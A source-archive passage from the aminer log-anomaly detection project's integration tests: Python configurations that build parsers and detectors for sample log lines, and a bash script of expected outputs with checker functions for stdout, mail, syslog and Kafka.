config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) analysis_context.register_component(simple_multisource_atom_sync, component_name="SimpleMultisourceAtomSync") # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/config22.py000066400000000000000000000211201437606560100253070ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement import datetime from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S', datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) from aminer.events.SyslogWriterEventHandler import SyslogWriterEventHandler syslog_writer_event_handler = SyslogWriterEventHandler(analysis_context) from aminer.events.KafkaEventHandler import KafkaEventHandler kafka_event_handler = KafkaEventHandler(analysis_context, 'test_topic', { 'bootstrap_servers': ['localhost:9092'], 'api_version': (2, 0, 1)}) from aminer.events.JsonConverterHandler import JsonConverterHandler json_converter_handler = JsonConverterHandler([kafka_event_handler], analysis_context) anomaly_event_handlers = [stream_printer_event_handler, syslog_writer_event_handler, json_converter_handler] from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync simple_multisource_atom_sync = SimpleMultisourceAtomSync([atom_filter], 9) # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [simple_multisource_atom_sync], anomaly_event_handlers, default_timestamp_path_list=['model/DiskUpgrade/Date']) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/declarations.sh000077500000000000000000000524621437606560100263500ustar00rootroot00000000000000#!/bin/bash source ../config # declare all expected values without the variable ones. These arrays are used to compare with the incoming log lines. declare -a NEW_PATH_HD_REPAIR_1=(" New path(es) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/DiskUpgrade: " ": System rebooted for hard disk upgrade" " /model/DiskUpgrade/DTM: " " /model/DiskUpgrade/UNameSpace1: " " /model/DiskUpgrade/UName: " " /model/DiskUpgrade/UNameSpace2: " " /model/DiskUpgrade/User: " " /model/DiskUpgrade/HDRepair: System rebooted for hard disk upgrade" "['/model/DiskUpgrade', '/model/DiskUpgrade/DTM', '/model/DiskUpgrade/UNameSpace1', '/model/DiskUpgrade/UName', '/model/DiskUpgrade/UNameSpace2', '/model/DiskUpgrade/User', '/model/DiskUpgrade/HDRepair']" "Original log line: ") declare -a UNPARSED_ATOM_1=(" Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" " System rebooted for hard disk upgrad") declare -a UNPARSED_ATOM_2=(" Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" ": System rebooted for hard disk upgrade") declare -a NEW_PATH_HOME_PATH_ROOT_1=(" New path(es) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/HomePath: The Path of the home directory shown by pwd of the user root is: /root" " /model/HomePath/Pwd: The Path of the home directory shown by pwd of the user " " /model/HomePath/Username: root" " /model/HomePath/Is: is: " " /model/HomePath/Path: /root" "['/model/HomePath', '/model/HomePath/Pwd', '/model/HomePath/Username', '/model/HomePath/Is', '/model/HomePath/Path']" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1=(" New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'root', b'/root')" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_USER_1=(" New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'user', b'/home/user')" "Original log line: The Path of the home directory shown by pwd of the user user is: /home/user") declare -a NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1=(" New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'guest', b'/home/guest')" "Original log line: The Path of the home directory shown by pwd of the user guest is: /home/guest") declare -a JSON_OUTPUT=() read -r -d '' VAR << END { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(es) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/DiskUpgrade", "/model/DiskUpgrade/DTM", "/model/DiskUpgrade/UNameSpace1", "/model/DiskUpgrade/UName", "/model/DiskUpgrade/UNameSpace2", "/model/DiskUpgrade/User", "/model/DiskUpgrade/HDRepair" ] }, "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/DiskUpgrade": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ", "/model/DiskUpgrade/DTM": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END "/model/DiskUpgrade/UNameSpace1": " ", "/model/DiskUpgrade/UName": "localhost", "/model/DiskUpgrade/UNameSpace2": " ", "/model/DiskUpgrade/User": "root:", "/model/DiskUpgrade/HDRepair": " System rebooted for hard disk upgrade" } } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(es) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath", "/model/HomePath/Pwd", "/model/HomePath/Username", "/model/HomePath/Is", "/model/HomePath/Path" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "root", "/root" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "user", "/home/user" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user user is: /home/user" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user user is: /home/user", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "user", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/user" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "guest", "/home/guest" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user guest is: /home/guest" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user guest is: /home/guest", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "guest", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/guest" } } } END JSON_OUTPUT+=("$VAR") # These strings are used in the isExpectedOutput()-function to identify the next array to be compared with. NEW_PATH_HD_REPAIR="new_path_hd_repair" UNPARSED_ATOM_HD_REPAIR="unparsed_atom_hd_repair" UNPARSED_ATOM_DATE_TIME="unparsed_atom_date_time" UNPARSED_ATOM_UNAME="unparsed_atom_uname" NEW_PATH_HOME_PATH_ROOT="new_path_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_ROOT="new_value_combination_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_USER="new_value_combination_home_path_user" NEW_VALUE_COMBINATION_HOME_PATH_GUEST="new_value_combination_home_path_guest" COUNTER=0 # This function checks if the input value starts with a date of the format YYYY-mm-dd HH:MM:SS. # $1 = String parameter to check function isDate() { if [[ $# -gt 0 && "$1" =~ [0-9]{4}\-[0-9]{2}\-[0-9]{2}\ [0-9]{2}:[0-9]{2}:[0-9]{2}* ]]; then return 0 fi return 1 } # This function checks if the input value contains the local UName. # $1 = String parameter to check function isUname() { if [[ $# -gt 0 && "$1" == *" `cat /etc/hostname`"* ]]; then return 0 fi return 1 } # This function checks if the input value contains name of the currently logged in user. # $1 = String parameter to check function isUser() { if [[ $# -gt 0 && "$1" == *" ` id -u -n`:"* ]]; then return 0 fi return 1 } # This function checks if the input value starts with a date followed by the local UName and the name of the currently logged in user. # The return values vary depending at which point the error occurs. # $1 = String parameter to check function startswithPredefinedMarkers() { if [ $# -eq 0 ]; then return 1 fi isDate "$1" if [ $? != 0 ]; then return 2 fi isUname "$1" if [ $? != 0 ]; then return 3 fi isUser "$1" if [ $? != 0 ]; then return 4 fi return 0 } # This function reads the output of the aminer, which is saved at /tmp/output, until an empty line occurs. # Every time a paragraph was read, the global variable $COUNTER is set to the iteration variable $i. # On the next call of this function all lines until $i equals $COUNTER are skipped. # $1 = String identifier for the expected values # $2 = Prefix position function isExpectedOutput() { before=$COUNTER i=0 temp=0 #ADD HERE if [[ $# -gt 0 && $1 == $NEW_PATH_HD_REPAIR ]]; then EXPECTED=("${NEW_PATH_HD_REPAIR_1[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_HD_REPAIR ]]; then EXPECTED=("${UNPARSED_ATOM_1[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_DATE_TIME ]]; then EXPECTED=("${UNPARSED_ATOM_2[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_UNAME ]]; then EXPECTED=("${UNPARSED_ATOM_2[@]}") elif [[ $# -gt 0 && $1 == $NEW_PATH_HOME_PATH_ROOT ]]; then EXPECTED=("${NEW_PATH_HOME_PATH_ROOT_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_ROOT ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_USER ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_USER_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_GUEST ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1[@]}") else echo "No valid expected value found!" return 1 fi input="/tmp/output" while IFS= read -r line do #echo "i $i" # Skip already processed lines. if [ $i -lt $COUNTER ]; then i=$((i + 1)) continue # Paragraphs always terminate with an empty line. This line also must be skipped. elif [[ $i -eq $COUNTER && $line == "" ]]; then i=$((i + 1)) temp=1 continue fi #echo "$line" # Every paragraph must start with an date of the format YYYY-mm-dd HH:MM:SS. if [ `expr $i - $COUNTER - $temp` -eq 0 ]; then isDate "$line" ret=$? if [[ $? != 0 ]]; then echo "isDate() return value: $ret" return 2 fi fi # When the prefix position is reached, the predefined markers are checked (date -> uname -> user). # To avoid this check, just use an negative or too high value for the prefix position. if [ `expr $i - $before - $temp` -eq $2 ]; then startswithPredefinedMarkers "$line" ret=$? #echo startswith $? if [[ $ret != 0 ]]; then echo "Startswith() return value: $ret" return 2 fi fi # At the end of an paragraph stop reading the file and go to return from the function. if [ "$line" == "" ]; then break # When the current line contains the expected value at the expected position, # read until the following values do not match or the EXPECTED array ends. elif [[ "$line" == *"${EXPECTED[$i - $before - $temp]}"* ]]; then i=$((i + 1)) while [[ "$line" == *"${EXPECTED[$i - $before - $temp]}"* && "${EXPECTED[$i - $before - $temp]}" != "" ]] do i=$((i + 1)) done # An error occured, when the line does not match or is not empty. else echo "line: $line" echo "expected: ${EXPECTED[$i - $before - $temp]}" return 2 fi done < "$input" COUNTER=$i # Check if all elements of the EXPECTED array were processed. if [ `expr $i - $before - $temp` == "${#EXPECTED[@]}" ]; then return 0 fi return 3 } # This function checks if the output of the StreamPrinterEventHandler is as expected. # The order of the events is fixed and must be expanded every time a new log line is added to the integration test. function checkAllOutputs() { res=0 isExpectedOutput $UNPARSED_ATOM_HD_REPAIR 2 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_PATH_HD_REPAIR -1 ret=$? if [ $ret == 0 ]; then echo "NewMatchPath found as expected." else echo "Expected NewMatchPath was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $UNPARSED_ATOM_HD_REPAIR 2 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $UNPARSED_ATOM_UNAME -1 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_PATH_HOME_PATH_ROOT -1 ret=$? if [ $ret == 0 ]; then echo "NewMatchPath found as expected." else echo "Expected NewMatchPath was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_ROOT -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_USER -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_GUEST -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi #ADD HERE return $res } # This function checks if the output of the DefaultMailNotificationEventHandler is as expected. # The $linecount variable is the fixed count of log lines and must be changed every time a new log line is added. # At each loop run one mail is read into /tmp/out from which further checks are made. function checkAllMails() { res=0 linecount=10 dpkg -s mailutils &> /dev/null if [ ! $? -eq 0 ]; then echo -e "\e[31mMailutils-package is not installed! Installing it now..]" sudo apt install mailutils -y fi echo "" echo "waiting for mails to arrive.." echo "" i=1 while [ $i -lt $linecount ] do sudo echo p | mail > /tmp/out input="/tmp/out" t=false aminerMail=false while IFS= read -r searched do # Between all mail headers and the content and after the content of the mail always is an empty line. # The paragraph found in the content must also be found in the previously created /tmp/output file. if [ "$searched" == "" ]; then if [ $t == false ]; then t=true else break fi fi # If the first empty line was found and the subject equals "aminer Alerts:" the following paragraph # must be found in the previously created /tmp/output file. if [[ $t == true && $aminerMail == true ]]; then expected="/tmp/output" found=false while IFS= read -r line do if [[ "$line" == "$searched" ]]; then found=true break fi done < "$expected" # Set the aminerMail boolean to True, when the expected subject was found elif [[ "$searched" == *"Subject: aminer Alerts:"* ]]; then #echo "Subject found!" aminerMail=true # Stop searching, when the subject is not the expected aminer subject. elif [[ "$searched" != *"Subject: aminer Alerts:"* && "$searched" == *"Subject:"* ]]; then echo "wrong mail" i=$(($i-1)) break fi # If the time is lesser than the start time of the integration test, an old mail is found. if [[ "$searched" == *"Date: "* ]]; then d="${searched:6}" dat=`date -d "$d" +%s` if [[ $dat -lt $time ]]; then echo "old mail" i=$(($i-1)) break fi fi # An error occured, when a line was not found in the /tmp/output file. if [[ $t == true && $aminerMail == true && $found == false ]]; then echo "$searched" echo "$line" echo "not found!" res=1 fi done < "$input" i=$(($i+1)) done echo "finished waiting.." return $res } # This function checks if the output of the Syslog is as expected. function checkAllSyslogs(){ sudo tail -n 1000 /var/log/syslog > /tmp/out lastLine=`tail -n 1 /tmp/output` if [[ $lastLine == "" ]]; then sudo sed -i "$ d" /tmp/output fi cntr=0 input="/tmp/out" i=0 j=0 while IFS= read -r searched do # every syslog starts with a 15 characters long datetime. d="${searched:0:15}" dat=`date -d "$d" +%s` # Ignore all old syslogs and just process the current ones. if [[ !($dat -lt $time) ]]; then expected="/tmp/output" found=false g=0 while IFS= read -r line do if [ $g == $cntr ]; then # Increase the counters, when a paragraph finished. if [ "$line" == "" ]; then j=0 i=$(($i+1)) cntr=$(($cntr + 1)) g=$(($g+1)) continue fi # The first line of a paragraph always starts with the count of paragraphs logged. if [[ ($j == 0 && "$searched" == *": [$i] $line"*) ]]; then found=true cntr=$(($cntr + 1)) break # All other lines also contain a counter for the lines in the paragraph elif [[ "$searched" == *": [$i-$j] $line"* ]]; then found=true cntr=$(($cntr + 1)) break fi fi g=$(($g+1)) done < "$expected" if [ $found == true ]; then j=$(($j+1)) fi fi done < "$input" echo "finished waiting.." # $NUMBER_OF_LOG_LINES must always be the number of paragraphs in /tmp/output minus one, # as there is no empty line before the first paragraph. if [ $i == $NUMBER_OF_LOG_LINES ]; then return 0 fi return 1 } # This function checks if the output of the Kafka Topic is as expected. function checkKafkaTopic(){ out=$($KAFKA_VERSIONSTRING/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic test_topic --from-beginning --timeout-ms 3000) for t in "${JSON_OUTPUT[@]}" do if [[ $out != *"$t"* ]]; then echo "searched: $t" echo echo "remaining output: $out" return 1 fi # cut the output string to remove timestamps and datetimes. out=${out#*$t} done return 0 } 